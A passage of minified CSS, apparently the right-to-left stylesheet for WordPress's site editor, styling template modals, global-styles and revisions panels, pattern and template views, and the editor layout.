inset:0; position:absolute; } input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-label:before{ cursor:pointer; } input[type=radio]:focus-visible~.fields-create-template-part-modal__area-radio-label:before{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:4px solid #0000; } .fields-create-template-part-modal__area-radio-checkmark,.fields-create-template-part-modal__area-radio-icon{ fill:currentColor; } input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-checkmark{ opacity:0; } .fields-create-template-part-modal__area-radio-description{ color:#757575; font-size:12px; grid-column:2 / 3; line-height:normal; margin:0; text-wrap:pretty; } input[type=radio]:not(:checked):hover~.fields-create-template-part-modal__area-radio-description{ color:inherit; } .fields-controls__slug{ border:0; margin:0; padding:0; } .fields-controls__slug .fields-controls__slug-external-icon{ margin-right:5ch; } .fields-controls__slug .fields-controls__slug-input input.components-input-control__input{ padding-inline-start:0 !important; } .fields-controls__slug .fields-controls__slug-help-link{ word-break:break-word; } .fields-controls__slug .fields-controls__slug-help{ display:flex; flex-direction:column; } .fields-controls__slug .fields-controls__slug-help .fields-controls__slug-help-slug{ font-weight:600; } .fields-controls__featured-image-placeholder{ background:#fff linear-gradient(45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); border-radius:2px; box-shadow:inset 0 0 0 1px #0003; display:inline-block; padding:0; } .fields-controls__featured-image-title{ color:#1e1e1e; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:100%; } .fields-controls__featured-image-image{ align-self:center; border-radius:2px; height:100%; width:100%; } .fields-controls__featured-image-container .fields-controls__featured-image-placeholder{ margin:0; } .fields-controls__featured-image-container span{ margin-left:auto; } fieldset.fields-controls__featured-image{ border:0; margin:0; padding:0; } fieldset.fields-controls__featured-image .fields-controls__featured-image-container{ border:1px solid #ddd; border-radius:2px; cursor:pointer; padding:8px 12px; } fieldset.fields-controls__featured-image .fields-controls__featured-image-container:hover{ background-color:#f0f0f0; } fieldset.fields-controls__featured-image .fields-controls__featured-image-placeholder{ height:24px; width:24px; } fieldset.fields-controls__featured-image span{ align-self:center; text-align:start; white-space:nowrap; } fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button{ height:fit-content; padding:0; } fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:focus,fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:hover{ border:0; color:unset; } fieldset.fields-controls__featured-image .fields-controls__featured-image-remove-button{ place-self:end; } .dataforms-layouts-panel__field-control .fields-controls__featured-image-image,.dataforms-layouts-panel__field-control .fields-controls__featured-image-placeholder{ height:16px; width:16px; } .dataviews-view-grid__media .fields-controls__featured-image-image,.dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-image,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{ border-radius:4px; display:block; height:100%; width:100%; } .dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{ background:#f0f0f0; box-shadow:none; } .dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{ height:32px; width:32px; } .fields-controls__parent,.fields-controls__password,.fields-controls__template{ border:0; margin:0; padding:0; } .fields-controls__template-modal{ z-index:1000001; } .fields-controls__template-content .block-editor-block-patterns-list{ column-count:2; column-gap:24px; padding-top:2px; } @media (min-width:782px){ .fields-controls__template-content .block-editor-block-patterns-list{ column-count:3; } } @media (min-width:1280px){ .fields-controls__template-content .block-editor-block-patterns-list{ column-count:4; } } .fields-controls__template-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .fields-field__title>span:first-child{ display:block; flex-grow:0; overflow:hidden; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; } .fields-field__pattern-title span:first-child{ flex:1; } .edit-site-custom-template-modal__contents-wrapper{ height:100%; justify-content:flex-start !important; } .edit-site-custom-template-modal__contents-wrapper>*{ width:100%; } .edit-site-custom-template-modal__contents-wrapper__suggestions_list{ margin-left:-12px; margin-right:-12px; width:calc(100% + 24px); } .edit-site-custom-template-modal__contents>.components-button{ height:auto; justify-content:center; } @media (min-width:782px){ .edit-site-custom-template-modal{ width:456px; } } @media (min-width:600px){ .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list{ max-height:224px; overflow-y:auto; } } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item{ display:block; height:auto; overflow-wrap:break-word; padding:8px 12px; text-align:right; white-space:pre-wrap; width:100%; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item mark{ background:none; font-weight:700; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .04); } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover *,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover mark{ color:var(--wp-admin-theme-color); } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus{ background-color:#f0f0f0; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color) inset; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__title{ display:block; overflow:hidden; text-overflow:ellipsis; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info{ color:#757575; word-break:break-all; } .edit-site-custom-template-modal__no-results{ border:1px solid #ccc; border-radius:2px; padding:16px; } .edit-site-custom-generic-template__modal .components-modal__header{ border-bottom:none; } .edit-site-custom-generic-template__modal .components-modal__content:before{ margin-bottom:4px; } @media (min-width:960px){ .edit-site-add-new-template__modal{ margin-top:64px; max-height:calc(100% - 128px); max-width:832px; width:calc(100% - 128px); } } .edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button svg,.edit-site-add-new-template__modal .edit-site-add-new-template__template-button svg{ fill:var(--wp-admin-theme-color); } .edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button .edit-site-add-new-template__template-name{ align-items:flex-start; flex-grow:1; } .edit-site-add-new-template__modal .edit-site-add-new-template__template-icon{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-radius:100%; max-height:40px; max-width:40px; padding:8px; } .edit-site-add-new-template__template-list__contents>.components-button,.edit-site-custom-template-modal__contents>.components-button{ border:1px solid #ddd; display:flex; flex-direction:column; justify-content:center; outline:1px solid #0000; padding:32px; } .edit-site-add-new-template__template-list__contents>.components-button span:first-child,.edit-site-custom-template-modal__contents>.components-button span:first-child{ color:#1e1e1e; } .edit-site-add-new-template__template-list__contents>.components-button span,.edit-site-custom-template-modal__contents>.components-button span{ color:#757575; } .edit-site-add-new-template__template-list__contents>.components-button:hover,.edit-site-custom-template-modal__contents>.components-button:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-color:#0000; color:var(--wp-admin-theme-color-darker-10); } .edit-site-add-new-template__template-list__contents>.components-button:hover span,.edit-site-custom-template-modal__contents>.components-button:hover span{ color:var(--wp-admin-theme-color); } .edit-site-add-new-template__template-list__contents>.components-button:focus,.edit-site-custom-template-modal__contents>.components-button:focus{ border-color:#0000; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:3px solid #0000; } .edit-site-add-new-template__template-list__contents>.components-button:focus span:first-child,.edit-site-custom-template-modal__contents>.components-button:focus span:first-child{ color:var(--wp-admin-theme-color); } .edit-site-add-new-template__template-list__contents .edit-site-add-new-template__custom-template-button,.edit-site-add-new-template__template-list__contents .edit-site-add-new-template__template-list__prompt,.edit-site-custom-template-modal__contents .edit-site-add-new-template__custom-template-button,.edit-site-custom-template-modal__contents .edit-site-add-new-template__template-list__prompt{ grid-column:1 / -1; } .edit-site-add-new-template__template-list__contents>.components-button{ align-items:flex-start; height:100%; text-align:start; } .edit-site-visual-editor__editor-canvas.is-focused{ outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-2); } .edit-site-canvas-loader{ align-items:center; display:flex; height:100%; justify-content:center; opacity:0; position:absolute; right:0; top:0; width:100%; } @media not (prefers-reduced-motion){ .edit-site-canvas-loader{ animation:edit-site-canvas-loader__fade-in-animation .5s ease .2s; animation-fill-mode:forwards; } } .edit-site-canvas-loader>div{ width:160px; } @keyframes edit-site-canvas-loader__fade-in-animation{ 0%{ opacity:0; } to{ opacity:1; } } .edit-site-global-styles-preview{ align-items:center; cursor:pointer; display:flex; justify-content:center; line-height:1; } .edit-site-global-styles-preview__wrapper{ display:block; max-width:100%; width:100%; } .edit-site-typography-preview{ align-items:center; background:#f0f0f0; border-radius:2px; display:flex; justify-content:center; margin-bottom:16px; min-height:100px; overflow:hidden; } .edit-site-font-size__item{ line-break:anywhere; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .edit-site-font-size__item-value{ color:#757575; } .edit-site-global-styles-screen{ margin:12px 16px 16px; } .edit-site-global-styles-screen-typography__indicator{ align-items:center; border-radius:1px; display:flex !important; font-size:14px; height:24px; justify-content:center; width:24px; } .edit-site-global-styles-screen-typography__font-variants-count{ color:#757575; } .edit-site-global-styles-font-families__manage-fonts{ justify-content:center; } .edit-site-global-styles-screen .color-block-support-panel{ border-top:none; padding-left:0; padding-right:0; padding-top:0; row-gap:12px; } .edit-site-global-styles-header__description{ padding:0 16px; } .edit-site-block-types-search{ margin-bottom:8px; padding:0 16px; } .edit-site-global-styles-header{ margin-bottom:0 !important; } .edit-site-global-styles-subtitle{ font-size:11px !important; font-weight:500 !important; margin-bottom:0 !important; text-transform:uppercase; } .edit-site-global-styles-section-title{ color:#2f2f2f; font-weight:600; line-height:1.2; margin:0; padding:16px 16px 0; } .edit-site-global-styles-icon-with-current-color{ fill:currentColor; } .edit-site-global-styles__color-indicator-wrapper{ flex-shrink:0; height:24px; } .edit-site-global-styles__shadows-panel__options-container,.edit-site-global-styles__typography-panel__options-container{ height:24px; } .edit-site-global-styles__block-preview-panel{ border:1px solid #e0e0e0; border-radius:4px; overflow:hidden; position:relative; width:100%; } .edit-site-global-styles__shadow-preview-panel{ background-image:repeating-linear-gradient(-45deg, #f5f5f5 25%, #0000 0, #0000 75%, #f5f5f5 0, #f5f5f5), repeating-linear-gradient(-45deg, #f5f5f5 25%, #0000 0, #0000 75%, #f5f5f5 0, #f5f5f5); background-position:100% 0, right 8px top 8px; background-size:16px 16px; border:1px solid #e0e0e0; border-radius:4px; height:144px; overflow:auto; } .edit-site-global-styles__shadow-preview-panel .edit-site-global-styles__shadow-preview-block{ background-color:#fff; border:1px solid #e0e0e0; border-radius:2px; height:60px; width:60%; } .edit-site-global-styles__shadow-editor__dropdown-content{ width:280px; } .edit-site-global-styles__shadow-editor-panel{ margin-bottom:4px; } .edit-site-global-styles__shadow-editor__dropdown{ position:relative; width:100%; } .edit-site-global-styles__shadow-editor__dropdown-toggle{ border-radius:inherit; height:auto; padding-bottom:8px; padding-top:8px; text-align:right; width:100%; } .edit-site-global-styles__shadow-editor__dropdown-toggle.is-open{ background:#f0f0f0; color:var(--wp-admin-theme-color); } .edit-site-global-styles__shadow-editor__remove-button{ left:8px; opacity:0; position:absolute; top:8px; } .edit-site-global-styles__shadow-editor__remove-button.edit-site-global-styles__shadow-editor__remove-button{ border:none; } .edit-site-global-styles__shadow-editor__dropdown-toggle:hover+.edit-site-global-styles__shadow-editor__remove-button,.edit-site-global-styles__shadow-editor__remove-button:focus,.edit-site-global-styles__shadow-editor__remove-button:hover{ opacity:1; } @media (hover:none){ .edit-site-global-styles__shadow-editor__remove-button{ opacity:1; } } .edit-site-global-styles-screen-css{ display:flex; flex:1 1 auto; flex-direction:column; margin:16px; } .edit-site-global-styles-screen-css .components-v-stack{ flex:1 1 auto; } .edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input,.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field{ display:flex; flex:1 1 auto; flex-direction:column; } .edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field .components-textarea-control__input{ direction:ltr; flex:1 1 auto; } .edit-site-global-styles-screen-css-help-link{ display:inline-block; margin-top:8px; } .edit-site-global-styles-screen-variations{ border-top:1px solid #ddd; margin-top:16px; } .edit-site-global-styles-screen-variations>*{ margin:24px 16px; } .edit-site-global-styles-sidebar__navigator-provider{ height:100%; } .edit-site-global-styles-sidebar__navigator-screen{ display:flex; flex-direction:column; height:100%; } .edit-site-global-styles-sidebar__navigator-screen .single-column{ grid-column:span 1; } .edit-site-global-styles-screen-root.edit-site-global-styles-screen-root,.edit-site-global-styles-screen-style-variations.edit-site-global-styles-screen-style-variations{ background:unset; color:inherit; } .edit-site-global-styles-sidebar__panel .block-editor-block-icon svg{ fill:currentColor; } .edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile,.edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile .edit-site-global-styles-screen-root__active-style-tile-preview{ border-radius:2px; } .edit-site-global-styles-screen-revisions__revisions-list{ flex-grow:1; list-style:none; margin:0 16px 16px; } .edit-site-global-styles-screen-revisions__revisions-list li{ margin-bottom:0; } .edit-site-global-styles-screen-revisions__revision-item{ cursor:pointer; display:flex; flex-direction:column; position:relative; } .edit-site-global-styles-screen-revisions__revision-item[role=option]:active,.edit-site-global-styles-screen-revisions__revision-item[role=option]:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .edit-site-global-styles-screen-revisions__revision-item:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .04); } .edit-site-global-styles-screen-revisions__revision-item:hover .edit-site-global-styles-screen-revisions__date{ color:var(--wp-admin-theme-color); } .edit-site-global-styles-screen-revisions__revision-item:after,.edit-site-global-styles-screen-revisions__revision-item:before{ content:"\a"; display:block; position:absolute; } .edit-site-global-styles-screen-revisions__revision-item:before{ background:#ddd; border:4px solid #0000; border-radius:50%; height:8px; right:17px; top:18px; transform:translate(50%, -50%); width:8px; z-index:1; } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-radius:2px; color:var(--wp-admin-theme-color); outline:3px solid #0000; outline-offset:-2px; } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__date{ color:var(--wp-admin-theme-color); } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]:before{ background:var(--wp-admin-theme-color); } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__changes>li,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__meta{ color:#1e1e1e; } .edit-site-global-styles-screen-revisions__revision-item:after{ border:.5px solid #ddd; height:100%; right:16px; top:0; width:0; } .edit-site-global-styles-screen-revisions__revision-item:first-child:after{ top:18px; } .edit-site-global-styles-screen-revisions__revision-item:last-child:after{ height:18px; } .edit-site-global-styles-screen-revisions__revision-item-wrapper{ display:block; padding:12px 40px 4px 12px; } .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__apply-button.is-primary{ align-self:flex-start; margin:4px 40px 12px 12px; } .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__changes,.edit-site-global-styles-screen-revisions__meta{ color:#757575; font-size:12px; } .edit-site-global-styles-screen-revisions__description{ align-items:flex-start; display:flex; flex-direction:column; gap:8px; } .edit-site-global-styles-screen-revisions__description .edit-site-global-styles-screen-revisions__date{ font-size:12px; font-weight:600; text-transform:uppercase; } .edit-site-global-styles-screen-revisions__meta{ align-items:flex-start; display:flex; justify-content:start; margin-bottom:4px; text-align:right; width:100%; } .edit-site-global-styles-screen-revisions__meta img{ border-radius:100%; height:16px; margin-left:8px; width:16px; } .edit-site-global-styles-screen-revisions__loading{ margin:24px auto !important; } .edit-site-global-styles-screen-revisions__changes{ line-height:1.4; list-style:disc; margin-right:12px; text-align:right; } .edit-site-global-styles-screen-revisions__changes li{ margin-bottom:4px; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination{ gap:2px; justify-content:space-between; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .edit-site-pagination__total{ height:1px; margin:-1px; overflow:hidden; position:absolute; right:-1000px; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-text{ font-size:12px; will-change:opacity; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary{ color:#1e1e1e; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary:disabled,.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary[aria-disabled=true]{ color:#949494; } .edit-site-global-styles-screen-revisions__footer{ background:#fff; border-top:1px solid #ddd; bottom:0; height:56px; min-width:100%; padding:12px; position:sticky; z-index:1; } .edit-site-global-styles-sidebar{ display:flex; flex-direction:column; min-height:100%; } .edit-site-global-styles-sidebar__panel{ flex:1; } .edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-title{ margin:0; } .edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-actions{ flex:1; } .edit-site-global-styles-sidebar .components-navigation__menu-title-heading{ font-size:15.6px; font-weight:500; } .edit-site-global-styles-sidebar .components-navigation__item>button span{ font-weight:500; } .edit-site-global-styles-sidebar .block-editor-panel-color-gradient-settings{ border:0; } .edit-site-global-styles-sidebar .single-column{ grid-column:span 1; } .edit-site-global-styles-sidebar .components-tools-panel .span-columns{ grid-column:1 / -1; } .edit-site-global-styles-sidebar__blocks-group{ border-top:1px solid #e0e0e0; padding-top:24px; } .edit-site-global-styles-sidebar__blocks-group-help{ padding:0 16px; } .edit-site-global-styles-color-palette-panel,.edit-site-global-styles-gradient-palette-panel{ padding:16px; } .edit-site-global-styles-sidebar hr{ margin:0; } .show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon{ width:auto; } .show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon svg{ display:none; } .show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .edit-site-patterns__delete-modal{ width:384px; } .page-patterns-preview-field{ align-items:center; border-radius:4px; display:flex; flex-direction:column; height:100%; justify-content:center; } .dataviews-view-grid .page-patterns-preview-field .block-editor-block-preview__container{ height:100%; } .dataviews-view-table .page-patterns-preview-field{ flex-grow:0; text-wrap:balance; text-wrap:pretty; width:96px; } .edit-site-patterns__pattern-icon{ fill:var(--wp-block-synced-color); flex-shrink:0; } .edit-site-patterns__section-header{ border-bottom:1px solid #f0f0f0; flex-shrink:0; min-height:40px; padding:16px 48px; position:sticky; top:0; z-index:2; } @media not (prefers-reduced-motion){ .edit-site-patterns__section-header{ transition:padding .1s ease-out; } } .edit-site-patterns__section-header .edit-site-patterns__title{ min-height:40px; } .edit-site-patterns__section-header .edit-site-patterns__title .components-heading{ flex-basis:0; flex-grow:1; white-space:nowrap; } .edit-site-patterns__section-header .edit-site-patterns__sub-title{ margin-bottom:8px; } .edit-site-patterns__section-header .screen-reader-shortcut:focus{ top:0; } .edit-site-page-patterns-dataviews .dataviews-view-grid__badge-fields .dataviews-view-grid__field-value:has(.edit-site-patterns__field-sync-status-fully){ background:rgba(var(--wp-block-synced-color--rgb), .04); color:var(--wp-block-synced-color); } .dataviews-action-modal__duplicate-pattern [role=dialog]>[role=document]{ width:350px; } .dataviews-action-modal__duplicate-pattern .patterns-menu-items__convert-modal-categories{ position:relative; } .dataviews-action-modal__duplicate-pattern .components-form-token-field__suggestions-list:not(:empty){ background-color:#fff; border:1px solid var(--wp-admin-theme-color); border-bottom-left-radius:2px; border-bottom-right-radius:2px; box-shadow:0 0 .5px .5px var(--wp-admin-theme-color); box-sizing:border-box; max-height:96px; min-width:auto; position:absolute; right:-1px; width:calc(100% + 2px); z-index:1; } @media (min-width:600px){ .dataviews-action-modal__duplicate-template-part .components-modal__frame{ max-width:500px; } } @container (max-width: 430px){ .edit-site-page-patterns-dataviews .edit-site-patterns__section-header{ padding-left:24px; padding-right:24px; } } .page-templates-preview-field{ align-items:center; border-radius:4px; display:flex; flex-direction:column; height:100%; justify-content:center; width:100%; } .dataviews-view-list .page-templates-preview-field .block-editor-block-preview__container{ height:120px; } .dataviews-view-grid .page-templates-preview-field .block-editor-block-preview__container{ height:100%; } .dataviews-view-table .page-templates-preview-field{ max-height:160px; position:relative; text-wrap:balance; text-wrap:pretty; width:120px; } .edit-site-page-templates .dataviews-pagination{ z-index:2; } .page-templates-author-field__avatar{ align-items:center; display:flex; flex-shrink:0; height:24px; justify-content:right; overflow:hidden; width:24px; } .page-templates-author-field__avatar img{ border-radius:100%; height:16px; object-fit:cover; opacity:0; width:16px; } @media not (prefers-reduced-motion){ .page-templates-author-field__avatar img{ transition:opacity .1s linear; } } .page-templates-author-field__avatar.is-loaded img{ opacity:1; } .page-templates-author-field__icon{ display:flex; flex-shrink:0; height:24px; width:24px; } .page-templates-author-field__icon svg{ margin-right:-4px; fill:currentColor; } .page-templates-author-field__name{ overflow:hidden; text-overflow:ellipsis; } .edit-site-list__rename-modal{ z-index:1000001; } @media (min-width:782px){ .edit-site-list__rename-modal .components-base-control{ width:320px; } } .edit-site-editor__editor-interface{ opacity:1; } @media not (prefers-reduced-motion){ .edit-site-editor__editor-interface{ transition:opacity .1s ease-out; } } .edit-site-editor__editor-interface.is-loading{ opacity:0; } .edit-site-editor__toggle-save-panel{ background-color:#fff; border:1px dotted #ddd; box-sizing:border-box; display:flex; justify-content:center; padding:24px; width:280px; } .edit-site-editor__view-mode-toggle{ view-transition-name:toggle; height:64px; right:0; top:0; width:64px; z-index:100; } .edit-site-editor__view-mode-toggle .components-button{ align-items:center; border-radius:0; color:#fff; display:flex; height:100%; justify-content:center; overflow:hidden; padding:0; width:100%; } .edit-site-editor__view-mode-toggle .components-button:active,.edit-site-editor__view-mode-toggle .components-button:hover{ color:#fff; } .edit-site-editor__view-mode-toggle .components-button:focus{ box-shadow:none; } .edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon img,.edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon svg{ background:#1e1e1e; display:block; } .edit-site-editor__back-icon{ align-items:center; background-color:#ccc; display:flex; height:64px; justify-content:center; pointer-events:none; position:absolute; right:0; top:0; width:64px; } .edit-site-editor__back-icon svg{ fill:currentColor; } .edit-site-editor__back-icon.has-site-icon{ backdrop-filter:saturate(180%) blur(15px); background-color:#fff9; } .edit-site-welcome-guide{ width:312px; } .edit-site-welcome-guide.guide-editor .edit-site-welcome-guide__image,.edit-site-welcome-guide.guide-styles .edit-site-welcome-guide__image{ background:#00a0d2; } .edit-site-welcome-guide.guide-page .edit-site-welcome-guide__video{ border-left:16px solid #3858e9; border-top:16px solid #3858e9; } .edit-site-welcome-guide.guide-template .edit-site-welcome-guide__video{ border-right:16px solid #3858e9; border-top:16px solid #3858e9; } .edit-site-welcome-guide__image{ margin:0 0 16px; } .edit-site-welcome-guide__image>img{ display:block; max-width:100%; object-fit:cover; } .edit-site-welcome-guide__heading{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:24px; line-height:1.4; margin:16px 0; padding:0 32px; } .edit-site-welcome-guide__text{ font-size:13px; line-height:1.4; margin:0 0 16px; padding:0 32px; } .edit-site-welcome-guide__text img{ vertical-align:bottom; } .edit-site-welcome-guide__inserter-icon{ margin:0 4px; vertical-align:text-top; } .edit-site-layout{ color:#ccc; display:flex; flex-direction:column; height:100%; } .edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{ background:#1e1e1e; } .edit-site-layout__content{ display:flex; flex-grow:1; height:100%; } .edit-site-layout__sidebar-region{ flex-shrink:0; width:100vw; z-index:1; } @media (min-width:782px){ .edit-site-layout__sidebar-region{ width:300px; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{ height:100vh; position:fixed !important; right:0; top:0; } .edit-site-layout__sidebar-region .edit-site-layout__sidebar{ display:flex; flex-direction:column; height:100%; } .edit-site-layout__sidebar-region .resizable-editor__drag-handle{ left:0; } .edit-site-layout__main{ display:flex; flex-direction:column; flex-grow:1; overflow:hidden; } .edit-site-layout__mobile{ display:flex; flex-direction:column; position:relative; width:100%; z-index:2; } .edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{ padding:0; } .edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{ padding:0 12px; } .edit-site-layout__canvas-container{ flex-grow:1; overflow:visible; position:relative; z-index:2; } .edit-site-layout__canvas-container.is-resizing:after{ bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:100; } .edit-site-layout__canvas{ align-items:center; bottom:0; display:flex; justify-content:center; position:absolute; right:0; top:0; width:100%; } .edit-site-layout__canvas.is-right-aligned{ justify-content:flex-end; } .edit-site-layout__canvas .edit-site-resizable-frame__inner{ color:#1e1e1e; } @media (min-width:782px){ .edit-site-layout__canvas{ bottom:16px; top:16px; width:calc(100% - 16px); } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; overflow:hidden; } } @media (min-width:782px) and (not (prefers-reduced-motion)){ .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ transition:border-radius,box-shadow .4s; } } @media (min-width:782px){ .edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ border-radius:8px; } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{ box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; } } .edit-site-layout.is-full-canvas .edit-site-layout__canvas{ bottom:0; top:0; width:100%; } .edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{ min-height:100% !important; position:relative !important; } .edit-site-template-pages-preview{ height:100%; } html.canvas-mode-edit-transition::view-transition-group(toggle){ animation-delay:255ms; } @media (prefers-reduced-motion){ ::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){ animation:none !important; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{ display:none; } .edit-site-layout__view-mode-toggle.components-button{ view-transition-name:toggle; align-items:center; background:#1e1e1e; border-radius:0; color:#fff; display:flex; height:64px; justify-content:center; overflow:hidden; padding:0; position:relative; width:64px; } .edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{ color:#fff; } .edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{ box-shadow:0 0 0 3px #1e1e1e, 0 0 0 6px var(--wp-admin-theme-color); outline:4px solid #0000; outline-offset:4px; } .edit-site-layout__view-mode-toggle.components-button:before{ border-radius:4px; bottom:9px; box-shadow:none; content:""; display:block; left:9px; position:absolute; right:17px; top:9px; } @media not (prefers-reduced-motion){ .edit-site-layout__view-mode-toggle.components-button:before{ transition:box-shadow .1s ease; } } .edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{ align-items:center; display:flex; height:64px; justify-content:center; width:64px; } .edit-site-layout__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:0; position:fixed !important; right:auto; top:-9999em; width:280px; z-index:100000; } .edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{ bottom:0; top:auto; } .edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{ top:0; } @media (min-width:782px){ .edit-site-layout__actions{ border-right:1px solid #ddd; } } .edit-site-layout__area{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; flex-grow:1; margin:0; overflow:hidden; } @media (min-width:782px){ .edit-site-layout__area{ border-radius:8px; margin:16px 0 16px 16px; } } .edit-site .components-editor-notices__snackbar{ bottom:16px; left:0; padding-left:16px; padding-right:16px; position:fixed; } .edit-site-save-hub{ border-top:1px solid #2f2f2f; color:#949494; flex-shrink:0; margin:0; padding:16px; } .edit-site-save-hub__button{ color:inherit; justify-content:center; width:100%; } .edit-site-save-hub__button[aria-disabled=true]{ opacity:1; } .edit-site-save-hub__button[aria-disabled=true]:hover{ color:inherit; } .edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{ color:#1e1e1e; } @media (min-width:600px){ .edit-site-save-panel__modal{ width:600px; } } 